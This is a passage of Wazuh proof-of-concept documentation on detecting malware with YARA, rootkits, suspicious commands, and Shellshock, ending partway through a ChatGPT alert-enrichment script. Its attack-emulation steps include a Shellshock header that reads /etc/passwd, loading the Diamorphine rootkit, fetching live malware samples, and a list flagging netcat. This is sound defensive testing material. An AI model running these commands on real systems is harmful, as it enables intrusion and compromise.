    $ sudo curl -LO https://github.com/VirusTotal/yara/archive/v4.5.5.tar.gz
    $ sudo tar -xvzf v4.5.5.tar.gz -C /usr/local/bin/ && rm -f v4.5.5.tar.gz
    $ cd /usr/local/bin/yara-4.5.5/
    $ sudo ./bootstrap.sh && sudo ./configure && sudo make && sudo make install && sudo make check
    

    RHEL

    $ sudo yum makecache
    $ sudo yum install epel-release
    $ sudo yum update
    $ sudo yum install -y make automake gcc autoconf libtool openssl-devel pkg-config jq
    $ sudo curl -LO https://github.com/VirusTotal/yara/archive/v4.5.5.tar.gz
    $ sudo tar -xvzf v4.5.5.tar.gz -C /usr/local/bin/ && rm -f v4.5.5.tar.gz
    $ cd /usr/local/bin/yara-4.5.5/
    $ sudo ./bootstrap.sh && sudo ./configure && sudo make && sudo make install && sudo make check
    
  2. Test that YARA is running properly:

    $ yara
    
    yara: wrong number of arguments
    Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
    
    Try `--help` for more options
    

    If the error message below is displayed:

    /usr/local/bin/yara: error while loading shared libraries: libyara.so.9: cannot open shared object file: No such file or directory.
    

    This means that the loader doesn’t find the libyara library usually located in /usr/local/lib. Add the /usr/local/lib path to the /etc/ld.so.conf loader configuration file to solve this:

    $ sudo su
    # echo "/usr/local/lib" >> /etc/ld.so.conf
    # ldconfig
    

    Switch back to the previous user.

  3. Download YARA detection rules:

    $ sudo mkdir -p /tmp/yara/rules
    $ sudo curl 'https://valhalla.nextron-systems.com/api/v1/get' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
    -H 'Accept-Language: en-US,en;q=0.5' \
    --compressed \
    -H 'Referer: https://valhalla.nextron-systems.com/' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' \
    --data 'demo=demo&apikey=1111111111111111111111111111111111111111111111111111111111111111&format=text' \
    -o /tmp/yara/rules/yara_rules.yar
    
  4. Create a yara.sh script in the /var/ossec/active-response/bin/ directory. This is necessary for the Wazuh-YARA Active Response scans:

    #!/bin/bash
    # Wazuh - Yara active response
    # Copyright (C) 2015-2022, Wazuh Inc.
    #
    # This program is free software; you can redistribute it
    # and/or modify it under the terms of the GNU General Public
    # License (version 2) as published by the FSF - Free Software
    # Foundation.
    
    
    #------------------------- Gather parameters -------------------------#
    
    # Extra arguments
    read INPUT_JSON
    YARA_PATH=$(echo $INPUT_JSON | jq -r .parameters.extra_args[1])
    YARA_RULES=$(echo $INPUT_JSON | jq -r .parameters.extra_args[3])
    FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.syscheck.path)
    
    # Set LOG_FILE path
    LOG_FILE="logs/active-responses.log"
    
    size=0
    actual_size=$(stat -c %s ${FILENAME})
    while [ ${size} -ne ${actual_size} ]; do
        sleep 1
        size=${actual_size}
        actual_size=$(stat -c %s ${FILENAME})
    done
    
    #----------------------- Analyze parameters -----------------------#
    
    if [[ ! $YARA_PATH ]] || [[ ! $YARA_RULES ]]
    then
        echo "wazuh-yara: ERROR - Yara active response error. Yara path and rules parameters are mandatory." >> ${LOG_FILE}
        exit 1
    fi
    
    #------------------------- Main workflow --------------------------#
    
    # Execute Yara scan on the specified filename
    yara_output="$("${YARA_PATH}"/yara -w -r "$YARA_RULES" "$FILENAME")"
    
    if [[ $yara_output != "" ]]
    then
        # Iterate every detected rule and append it to the LOG_FILE
        while read -r line; do
            echo "wazuh-yara: INFO - Scan result: $line" >> ${LOG_FILE}
        done <<< "$yara_output"
    fi
    
    exit 0;
    
  5. Change yara.sh file owner to root:wazuh and file permissions to 0750:

    $ sudo chown root:wazuh /var/ossec/active-response/bin/yara.sh
    $ sudo chmod 750 /var/ossec/active-response/bin/yara.sh
    
  6. Add the following within the <syscheck> block of the Wazuh agent /var/ossec/etc/ossec.conf configuration file to monitor the /tmp/yara/malware directory:

    <directories realtime="yes">/tmp/yara/malware</directories>
    
  7. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Wazuh server

Perform the following steps to configure Wazuh to alert for file changes in the endpoint monitored directory. The steps also configure an active response script to trigger whenever a suspicious file is detected.

  1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file. The rules detect FIM events in the monitored directory. They also alert when the YARA integration finds malware. You can modify the rules to detect events from other directories:

    <group name="syscheck,">
      <rule id="100300" level="7">
        <if_sid>550</if_sid>
        <field name="file">/tmp/yara/malware/</field>
        <description>File modified in /tmp/yara/malware/ directory.</description>
      </rule>
      <rule id="100301" level="7">
        <if_sid>554</if_sid>
        <field name="file">/tmp/yara/malware/</field>
        <description>File added to /tmp/yara/malware/ directory.</description>
      </rule>
    </group>
    
    <group name="yara,">
      <rule id="108000" level="0">
        <decoded_as>yara_decoder</decoded_as>
        <description>Yara grouping rule</description>
      </rule>
      <rule id="108001" level="12">
        <if_sid>108000</if_sid>
        <match>wazuh-yara: INFO - Scan result: </match>
        <description>File "$(yara_scanned_file)" is a positive match. Yara rule: $(yara_rule)</description>
      </rule>
    </group>
    
  2. Add the following decoders to the Wazuh server /var/ossec/etc/decoders/local_decoder.xml file. This allows extracting the information from YARA scan results:

    <decoder name="yara_decoder">
      <prematch>wazuh-yara:</prematch>
    </decoder>
    
    <decoder name="yara_decoder1">
      <parent>yara_decoder</parent>
      <regex>wazuh-yara: (\S+) - Scan result: (\S+) (\S+)</regex>
      <order>log_type, yara_rule, yara_scanned_file</order>
    </decoder>
    
  3. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf configuration file. This configures the Active Response module to trigger after the rule 100300 and 100301 are fired:

    <ossec_config>
      <command>
        <name>yara_linux</name>
        <executable>yara.sh</executable>
        <extra_args>-yara_path /usr/local/bin -yara_rules /tmp/yara/rules/yara_rules.yar</extra_args>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_linux</command>
        <location>local</location>
        <rules_id>100300,100301</rules_id>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. Create the directory /tmp/yara/malware:

    $ sudo mkdir /tmp/yara/malware
    
  2. Create the script /tmp/yara/malware/malware_downloader.sh on the monitored endpoint to download malware samples:

    #!/bin/bash
    # Wazuh - Malware Downloader for test purposes
    # Copyright (C) 2015-2022, Wazuh Inc.
    #
    # This program is free software; you can redistribute it
    # and/or modify it under the terms of the GNU General Public
    # License (version 2) as published by the FSF - Free Software
    # Foundation.
    
    function fetch_sample(){
    
      curl -s -XGET "$1" -o "$2"
    
    }
    
    echo "WARNING: Downloading Malware samples, please use this script with  caution."
    read -p "  Do you want to continue? (y/n)" -n 1 -r ANSWER
    echo
    
    if [[ $ANSWER =~ ^[Yy]$ ]]
    then
        echo
        # Mirai
        echo "# Mirai: https://en.wikipedia.org/wiki/Mirai_(malware)"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
        echo
    
        # Xbash
        echo "# Xbash: https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
        echo
    
        # VPNFilter
        echo "# VPNFilter: https://news.sophos.com/en-us/2018/05/24/vpnfilter-botnet-a-sophoslabs-analysis/"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
        echo
    
        # Webshell
        echo "# WebShell: https://github.com/SecWiki/WebShell-2/blob/master/Php/Worse%20Linux%20Shell.php"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
        echo
    fi
    
  3. Run the malware_downloader.sh script to download malware samples to the /tmp/yara/malware directory:

    $ sudo bash /tmp/yara/malware/malware_downloader.sh
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:yara

Configuration for Windows
Windows endpoint
Configure Python and YARA

Perform the following steps to install Python, YARA, and download YARA rules.

  1. Download Python executable installer from the official Python website.

  2. Run the Python installer once downloaded and make sure to check the following boxes:

    • Install launcher for all users

    • Add Python 3.X to PATH. This places the interpreter in the execution path.

  3. Download and install the latest Visual C++ Redistributable package.

  4. Open PowerShell with administrator privileges to download and extract YARA:

    > Invoke-WebRequest -Uri https://github.com/VirusTotal/yara/releases/download/v4.5.5/yara-4.5.5-2368-win64.zip -OutFile v4.5.5-win64.zip
    > Expand-Archive v4.5.5-win64.zip; Remove-Item v4.5.5-win64.zip
    
  5. Create a directory called C:\Program Files (x86)\ossec-agent\active-response\bin\yara\ and copy the YARA executable into it:

    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    > cp .\yara-v4.5.5-win64\yara64.exe 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    
  6. Install the valhallaAPI module:

    > pip install valhallaAPI
    
  7. Copy the following script and save it as download_yara_rules.py:

    from valhallaAPI.valhalla import ValhallaAPI
    
    v = ValhallaAPI(api_key="1111111111111111111111111111111111111111111111111111111111111111")
    response = v.get_rules_text()
    
    with open('yara_rules.yar', 'w') as fh:
        fh.write(response)
    
  8. Run the following commands to download the rules and place them in the C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\ directory:

    > python.exe download_yara_rules.py
    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
    > cp yara_rules.yar 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
    
Configure Active Response and FIM

Perform the steps below to configure the Wazuh FIM and an active response script for the detection of malicious files on the endpoint.

  1. Create the yara.bat script in the C:\Program Files (x86)\ossec-agent\active-response\bin\ directory. This is necessary for the Wazuh-YARA Active Response scans:

    @echo off
    
    setlocal enableDelayedExpansion
    
    reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && SET OS=32BIT || SET OS=64BIT
    
    
    if %OS%==32BIT (
        SET log_file_path="%programfiles%\ossec-agent\active-response\active-responses.log"
    )
    
    if %OS%==64BIT (
        SET log_file_path="%programfiles(x86)%\ossec-agent\active-response\active-responses.log"
    )
    
    set input=
    for /f "delims=" %%a in ('PowerShell -command "$logInput = Read-Host; Write-Output $logInput"') do (
        set input=%%a
    )
    
    
    set json_file_path="C:\Program Files (x86)\ossec-agent\active-response\stdin.txt"
    set syscheck_file_path=
    echo %input% > %json_file_path%
    
    for /F "tokens=* USEBACKQ" %%F in (`Powershell -Nop -C "(Get-Content 'C:\Program Files (x86)\ossec-agent\active-response\stdin.txt'|ConvertFrom-Json).parameters.alert.syscheck.path"`) do (
    set syscheck_file_path=%%F
    )
    
    del /f %json_file_path%
    set yara_exe_path="C:\Program Files (x86)\ossec-agent\active-response\bin\yara\yara64.exe"
    set yara_rules_path="C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\yara_rules.yar"
    echo %syscheck_file_path% >> %log_file_path%
    for /f "delims=" %%a in ('powershell -command "& \"%yara_exe_path%\" \"%yara_rules_path%\" \"%syscheck_file_path%\""') do (
        echo wazuh-yara: INFO - Scan result: %%a >> %log_file_path%
    )
    
    exit /b
    
  2. Add the C:\Users\<USER_NAME>\Downloads directory for monitoring within the <syscheck> block in the Wazuh agent configuration file C:\Program Files (x86)\ossec-agent\ossec.conf. Replace <USER_NAME> with the username of the endpoint:

    <directories realtime="yes">C:\Users\<USER_NAME>\Downloads</directories>
    
  3. Restart the Wazuh agent to apply the configuration changes:

    > Restart-Service -Name wazuh
    
Wazuh server

Perform the following steps on the Wazuh server. This allows alerting for changes in the endpoint monitored directory and configuring an active response script to trigger whenever it detects a suspicious file.

  1. Add the following decoders to the Wazuh server /var/ossec/etc/decoders/local_decoder.xml file. This allows extracting the information from YARA scan results:

    <decoder name="yara_decoder">
        <prematch>wazuh-yara:</prematch>
    </decoder>
    
    <decoder name="yara_decoder1">
        <parent>yara_decoder</parent>
        <regex>wazuh-yara: (\S+) - Scan result: (\S+) (\S+)</regex>
        <order>log_type, yara_rule, yara_scanned_file</order>
    </decoder>
    
  2. Add the following rules to the Wazuh server /var/ossec/etc/rules/local_rules.xml file. The rules detect FIM events in the monitored directory. They also alert when malware is found by the YARA integration. Replace <USER_NAME> with the username of the endpoint.

    <group name="syscheck,">
      <rule id="100303" level="7">
        <if_sid>550</if_sid>
        <field name="file">C:\\Users\\<USER_NAME>\\Downloads</field>
        <description>File modified in C:\Users\<USER_NAME>\Downloads directory.</description>
      </rule>
      <rule id="100304" level="7">
        <if_sid>554</if_sid>
        <field name="file">C:\\Users\\<USER_NAME>\\Downloads</field>
        <description>File added to C:\Users\<USER_NAME>\Downloads  directory.</description>
      </rule>
    </group>
    
    <group name="yara,">
      <rule id="108000" level="0">
        <decoded_as>yara_decoder</decoded_as>
        <description>Yara grouping rule</description>
      </rule>
    
      <rule id="108001" level="12">
        <if_sid>108000</if_sid>
        <match>wazuh-yara: INFO - Scan result: </match>
        <description>File "$(yara_scanned_file)" is a positive match. Yara rule: $(yara_rule)</description>
      </rule>
    </group>
    
  3. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf file:

    <ossec_config>
      <command>
        <name>yara_windows</name>
        <executable>yara.bat</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_windows</command>
        <location>local</location>
        <rules_id>100303,100304</rules_id>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation

Note

For testing purposes, we download the EICAR anti-malware test file as shown below. We recommend testing in a sandbox, not in a production environment.

Download a malware sample on the monitored Windows endpoint:

  1. Turn off Microsoft Virus and threat protection.

  2. Download the EICAR zip file:

    Invoke-WebRequest -Uri https://secure.eicar.org/eicar_com.zip -OutFile eicar.zip
    
  3. Unzip it:

    > Expand-Archive .\eicar.zip
    
  4. Copy the EICAR file to the monitored directory. Replace <USER_NAME> with the username of the endpoint.

    > cp .\eicar\eicar.com C:\Users\<USER_NAME>\Downloads
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:yara

Detecting hidden processes

In this use case, we show how Wazuh detects hidden processes created by a rootkit on a Linux endpoint. In this use case, you deploy a kernel-mode rootkit on an Ubuntu endpoint.

This rootkit hides from the kernel module list. It also hides selected processes from the ps utility. However, Wazuh detects it using setsid(), getpid(), and kill() system calls.

The Malware detection section of our documentation contains more details about how the Wazuh detects malware and the rootcheck module.

Infrastructure

Endpoint

Description

Ubuntu 22.04

On this endpoint, download, compile, and load a rootkit. Then, configure the Wazuh rootcheck module on this endpoint for anomaly detection.

Configuration

Perform the following steps on the Ubuntu endpoint to emulate a rootkit, and to run a rootcheck scan to detect it.

  1. Switch to the root user and update the kernel of this endpoint:

    $ sudo su
    # apt update
    
  2. Install packages required for building the rootkit:

    # apt -y install gcc git
    
  3. Next, configure the Wazuh agent to run rootcheck scans every 2 minutes. In the /var/ossec/etc/ossec.conf file. Set the frequency option in the <rootcheck> section to 120:

    <rootcheck>
      <disabled>no</disabled>
      <check_dev>yes</check_dev>
      <check_sys>yes</check_sys>
      <check_pids>yes</check_pids>
      <check_ports>yes</check_ports>
      <check_if>yes</check_if>
    
      <!-- rootcheck execution frequency - every 12 hours by default-->
    
      <frequency>120</frequency>
    
      <skip_nfs>yes</skip_nfs>
    </rootcheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
Attack emulation
Ubuntu endpoint
  1. Fetch the Diamorphine rootkit source code from GitHub:

    # git clone https://github.com/m0nad/Diamorphine
    
  2. Navigate to the Diamorphine directory and compile the source code:

    # cd Diamorphine
    # make
    
  3. Load the rootkit kernel module:

    # insmod diamorphine.ko
    

    The kernel-level rootkit “Diamorphine” is now installed on the Ubuntu endpoint.

    Note

    Depending on the environment, the module sometimes fails to load or function properly. If you receive the error insmod: ERROR: could not insert module diamorphine.ko: Invalid parameters in the last step, you can restart the Linux endpoint and try again. Sometimes it takes several tries for it to work.

  4. Run the kill signal 63 with the PID of a random process running on the Ubuntu endpoint. This unhides the Diamorphine rootkit. By default, Diamorphine hides itself so we don’t detect it by running the lsmod command. Try it out:

    # lsmod | grep diamorphine
    # kill -63 509
    # lsmod | grep diamorphine
    
    diamorphine            13155  0
    

    When using these last commands, you can expect an empty output. In the case of Diamorphine, any kill signal 63 sent to any process whether it exists or not, toggles the Diamorphine kernel module to hide or unhide.

  5. Run the following commands to see how the rsyslogd process is first visible and then no longer visible. This rootkit allows you to hide selected processes from the ps command. Sending a kill signal 31 hides/unhides any process.

    # ps auxw | grep rsyslogd | grep -v grep
    
    root       732  0.0  0.7 214452  3572 ?        Ssl  14:53   0:00 /usr/sbin/rsyslogd -n
    
    # kill -31 <PID_OF_RSYSLOGD>
    # ps auxw | grep rsyslog | grep -v grep
    

    When using this last command, you can expect an empty output.

The next rootcheck scan will run and alert us about the rsyslogd process which was hidden with the Diamorphine rootkit.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:rootcheck

Remember, if you run the same kill -31 command as before against rsyslogd, the rsyslogd process becomes visible again. The subsequent rootcheck scan would no longer generate alerts about it.

Monitoring execution of malicious commands

Auditd is an auditing utility native to Linux systems. It’s used for accounting actions and changes in a Linux endpoint.

In this use case, you configure Auditd on an Ubuntu endpoint to account for all commands executed by a given user. This includes commands run by a user in sudo mode or after changing to the root user. You configure a custom Wazuh rule to alert for suspicious commands.

Consider reading the Monitoring system calls section to get a broader picture of the ways to take advantage of it.

Infrastructure

Endpoint

Description

Ubuntu 22.04

On this endpoint, you configure Auditd to monitor the execution of malicious commands. Then, make use of the Wazuh CDB list lookup capability to create a list of potential malicious commands that can be run on it.

Configuration
Ubuntu endpoint

Perform the following steps to install Auditd and create the necessary audit rules to query all commands run by a privileged user.

  1. Install, start and enable Auditd if it’s not present on the endpoint:

    $ sudo apt -y install auditd
    $ sudo systemctl start auditd
    $ sudo systemctl enable auditd
    
  2. As the root user, execute the following commands to append audit rules to /etc/audit/audit.rules file:

    # echo "-a exit,always -F auid=1000 -F egid!=994 -F auid!=-1 -F arch=b32 -S execve -k audit-wazuh-c" >> /etc/audit/audit.rules
    # echo "-a exit,always -F auid=1000 -F egid!=994 -F auid!=-1 -F arch=b64 -S execve -k audit-wazuh-c" >> /etc/audit/audit.rules
    
  3. Reload the rules and confirm that they are in place:

    # sudo auditctl -R /etc/audit/audit.rules
    # sudo auditctl -l
    
    -a always,exit -F arch=b32 -S execve -F auid=1000 -F egid!=994 -F auid!=-1 -F key=audit-wazuh-c
    -a always,exit -F arch=b64 -S execve -F auid=1000 -F egid!=994 -F auid!=-1 -F key=audit-wazuh-c
    
  4. Add the following configuration to the Wazuh agent /var/ossec/etc/ossec.conf file. This allows the Wazuh agent to read the auditd logs file:

    <localfile>
      <log_format>audit</log_format>
      <location>/var/log/audit/audit.log</location>
    </localfile>
    
  5. Restart the Wazuh agent:

    $ sudo systemctl restart wazuh-agent
    
Wazuh server

Perform the following steps to create a CDB list of malicious programs and rules to detect the execution of the programs in the list.

  1. Look over the key-value pairs in the lookup file /var/ossec/etc/lists/audit-keys.

    audit-wazuh-w:write
    audit-wazuh-r:read
    audit-wazuh-a:attribute
    audit-wazuh-x:execute
    audit-wazuh-c:command
    

    This CDB list contains keys and values separated by colons.

    Note

    Wazuh allows you to maintain flat file CDB lists which must be key only or key:value pairs. These are compiled into a special binary format to facilitate high-performance lookups in Wazuh rules. Such lists must be created as files, added to the Wazuh configuration, and then compiled. After that, rules can be built to look up decoded fields in those CDB lists as part of their match criteria. For example, in addition to the text file /var/ossec/etc/lists/audit-keys, there is also a binary /var/ossec/etc/lists/audit-keys.cdb file that Wazuh uses for actual lookups.

  2. Create a CDB list /var/ossec/etc/lists/suspicious-programs and fill its content with the following:

    ncat:yellow
    nc:red
    tcpdump:orange
    
  3. Add the list to the <ruleset> section of the Wazuh server /var/ossec/etc/ossec.conf file:

    <list>etc/lists/suspicious-programs</list>
    
  4. Create a high severity rule to fire when a "red" program is executed. Add this new rule to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server.

    <group name="audit">
      <rule id="100210" level="12">
          <if_sid>80792</if_sid>
      <list field="audit.command" lookup="match_key_value" check_value="red">etc/lists/suspicious-programs</list>
        <description>Audit: Highly Suspicious Command executed: $(audit.exe)</description>
          <group>audit_command,</group>
      </rule>
    </group>
    
  5. Restart the Wazuh manager:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. On the Ubuntu endpoint, install and run a "red" program netcat:

    $ sudo apt -y install netcat
    # nc -v
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • data.audit.command:nc

Detecting a Shellshock attack

Wazuh is capable of detecting a Shellshock attack by analyzing web server logs collected from a monitored endpoint. In this use case, you set up an Apache web server on the Ubuntu endpoint and simulate a shellshock attack.

Infrastructure

Endpoint

Description

Ubuntu 22.04

Victim endpoint running an Apache 2.4.54 web server.

RHEL 9.0

This attacker endpoint sends a malicious HTTP request to the victim’s web server.

Configuration
Ubuntu endpoint

Perform the following steps to install an Apache web server and monitor its logs with the Wazuh agent.

  1. Update local packages and install the Apache web server:

    $ sudo apt update
    $ sudo apt install apache2
    
  2. If a firewall is enabled, modify it to allow external access to web ports. Skip this step if the firewall is disabled:

    $ sudo ufw app list
    $ sudo ufw allow 'Apache'
    $ sudo ufw status
    
  3. Check that the Apache web server is running:

    $ sudo systemctl status apache2
    
  4. Add the following lines to the Wazuh agent /var/ossec/etc/ossec.conf configuration file. This sets the Wazuh agent to monitor the access logs of your Apache server:

    <localfile>
        <log_format>syslog</log_format>
        <location>/var/log/apache2/access.log</location>
    </localfile>
    
  5. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Attack emulation
  1. Replace <WEBSERVER_IP_ADDRESS> with the Ubuntu IP address and execute the following command from the attacker endpoint:

    $ sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER_IP_ADDRESS>
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.description:Shellshock attack detected

  • If you have Suricata monitoring the endpoint traffic, you can also query rule.description:*CVE-2014-6271* for the related Suricata alerts.

Leveraging LLMs for alert enrichment

Large Language Model is a type of artificial intelligence (AI) model designed to understand, generate, and manipulate human language. These models are typically built using machine learning techniques, particularly those involving deep learning and neural networks. LLMs can add human-like intelligence to process data, enhancing the efficiency of various business and personal operations. LLMs such as the ones adopted by ChatGPT have gained massive popularity and are widely used in various industries including security operations.

YARA is a tool that detects and classifies malware artifacts. While YARA can identify known patterns and signatures of malicious activity, human intervention is often required to interpret and contextualize the output of YARA scans. ChatGPT is a generative AI chatbot developed by OpenAI. It provides users with various LLMs to process data. These LLMs can analyze and enrich YARA alerts with additional context, providing security teams with deeper insights into the nature and severity of detected threats.

In this use case, we integrate Wazuh with YARA to detect when a malicious file is added to a monitored endpoint. The integration utilizes the Wazuh FIM module to monitor a directory for new or modified files. When a file modification or addition is detected, the Wazuh Active Response module triggers a YARA scan on the file. The Active Response module automatically deletes the malicious file from the endpoint if it has a positive match with a malicious signature. The Active Response module then queries ChatGPT to enrich the YARA scan result with additional insight into the malicious file that helps security teams understand its nature, potential impact, and remediation.

Infrastructure

Endpoint

Description

Ubuntu 22.04

Monitored endpoint configured with Wazuh File Integrity Monitoring (FIM) module and YARA integration with ChatGPT log enrichment.

Windows 11

Monitored endpoint configured with Wazuh File Integrity Monitoring (FIM) module and YARA integration with ChatGPT log enrichment.

Configuration

Perform the following steps to set up the YARA and ChatGPT integration. Choose either Ubuntu or Windows configuration depending on the operating system of the monitored endpoint.

Ubuntu 22.04 endpoint

Perform the following steps to install YARA and configure the Active Response and FIM modules.

  1. Download, compile, and install YARA:

    $ sudo apt update
    $ sudo apt install -y make gcc autoconf libtool libssl-dev pkg-config jq
    $ sudo curl -LO https://github.com/VirusTotal/yara/archive/v4.5.1.tar.gz
    $ sudo tar -xvzf v4.5.1.tar.gz -C /usr/local/bin/ && rm -f v4.5.1.tar.gz
    $ cd /usr/local/bin/yara-4.5.1/
    $ sudo ./bootstrap.sh && sudo ./configure && sudo make && sudo make install && sudo make check
    $ sudo ldconfig
    
  2. Test that YARA is running properly:

    $ yara
    
    yara: wrong number of arguments
    Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
    
    Try `--help` for more options
    
  3. Download YARA detection rules using valhallaAPI. Valhalla is a YARA and Sigma rule repository provided by Nextron Systems:

    $ sudo mkdir -p /var/ossec/active-response/yara/rules
    $ sudo curl 'https://valhalla.nextron-systems.com/api/v1/get' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
    -H 'Accept-Language: en-US,en;q=0.5' \
    --compressed \
    -H 'Referer: https://valhalla.nextron-systems.com/' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' \
    --data 'demo=demo&apikey=1111111111111111111111111111111111111111111111111111111111111111&format=text' \
    -o /var/ossec/active-response/yara/rules/yara_rules.yar
    
  4. Change the owner of the yara_rules.yar file to root:wazuh, and the file permissions to 750:

    $ sudo chown root:wazuh /var/ossec/active-response/yara/rules/yara_rules.yar
    $ sudo chmod 750 /var/ossec/active-response/yara/rules/yara_rules.yar
    

    Note

    If you use a custom YARA rule, ensure that the description field in the YARA rule metadata is present as this field is required to enrich the alert with ChatGPT.

  5. Create a script yara.sh in the /var/ossec/active-response/bin/ directory. This script runs YARA scans on files added or modified in the monitored directories. It also queries ChatGPT to enrich the logs and attempts to remove malware files detected by YARA.

    Replace <API_KEY> with your OpenAI API key and <OPENAI_MODEL> with your preferred OpenAI model. The model used in this POC guide is gpt-4-turbo:

    #!/bin/bash
    # Wazuh - YARA active response
    # Copyright (C) 2015-2024, Wazuh Inc.
    #
    # This program is free software; you can redistribute it
    # and/or modify it under the terms of the GNU General Public
    # License (version 2) as published by the FSF - Free Software
    # Foundation.
    
    
    #------------------------- Configuration -------------------------#
    
    # ChatGPT API key
    API_KEY="<API_KEY>"
    OPENAI_MODEL="<OPENAI_MODEL>" #for example gpt-4-turbo
    
    
    # Set LOG_FILE path
    LOG_FILE="logs/active-responses.log"
    
    #------------------------- Gather parameters -------------------------#
    
    # Extra arguments
    read INPUT_JSON
    YARA_PATH=$(echo $INPUT_JSON | jq -r .parameters.extra_args[1])
    YARA_RULES=$(echo $INPUT_JSON | jq -r .parameters.extra_args[3])
    FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.syscheck.path)
    
    size=0
    actual_size=$(stat -c %s ${FILENAME})
    while [ ${size} -ne ${actual_size} ]; do
        sleep 1
        size=${actual_size}
        actual_size=$(stat -c %s ${FILENAME})
    done
    
    #----------------------- Analyze parameters -----------------------#
    
    if [[ ! $YARA_PATH ]] || [[ ! $YARA_RULES ]]
    then
        echo "wazuh-YARA: ERROR - YARA active response error. YARA path and rules parameters are mandatory." >> ${LOG_FILE}
        exit 1
    fi
    
    #------------------------- Main workflow --------------------------#
    
    # Execute YARA scan on the specified filename
    YARA_output="$("${YARA_PATH}"/yara -w -r -m "$YARA_RULES" "$FILENAME")"
    
    if [[ $YARA_output != "" ]]
    then
        # Attempt to delete the file if any YARA rule matches
        if rm -rf "$FILENAME"; then
            echo "wazuh-YARA: INFO - Successfully deleted $FILENAME" >> ${LOG_FILE}
        else
            echo "wazuh-YARA: INFO - Unable to delete $FILENAME" >> ${LOG_FILE}
        fi
    
        # Flag to check if API key is invalid
        api_key_invalid=false
    
        # Iterate every detected rule
        while read -r line; do
            # Extract the description from the line using regex
            description=$(echo "$line" | grep -oP '(?<=description=").*?(?=")')
            if [[ $description != "" ]]; then
                # Prepare the message payload for ChatGPT
                payload=$(jq -n \
                    --arg desc "$description" \
                    --arg model "$OPENAI_MODEL" \
                    '{
                        model: $model,
                        messages: [
                            {
                                role: "system",
                                content: "In one paragraph, tell me about the impact and how to mitigate \($desc)"
                            }
                        ],
                        temperature: 1,
                        max_tokens: 256,
                        top_p: 1,
                        frequency_penalty: 0,
                        presence_penalty: 0
                    }')
    
                # Query ChatGPT for more information
                chatgpt_response=$(curl -s -X POST "https://api.openai.com/v1/chat/completions" \
                    -H "Content-Type: application/json" \
                    -H "Authorization: Bearer $API_KEY" \
                    -d "$payload")
    
                # Check for invalid API key error
                if echo "$chatgpt_response" | grep -q "invalid_request_error"; then
                    api_key_invalid=true
                    echo "wazuh-YARA: ERROR - Invalid ChatGPT API key" >> ${LOG_FILE}
                    # Log Yara scan result without ChatGPT response
                    echo "wazuh-YARA: INFO - Scan result: $line | chatgpt_response: none" >> ${LOG_FILE}
                else
                    # Extract the response text from ChatGPT API response
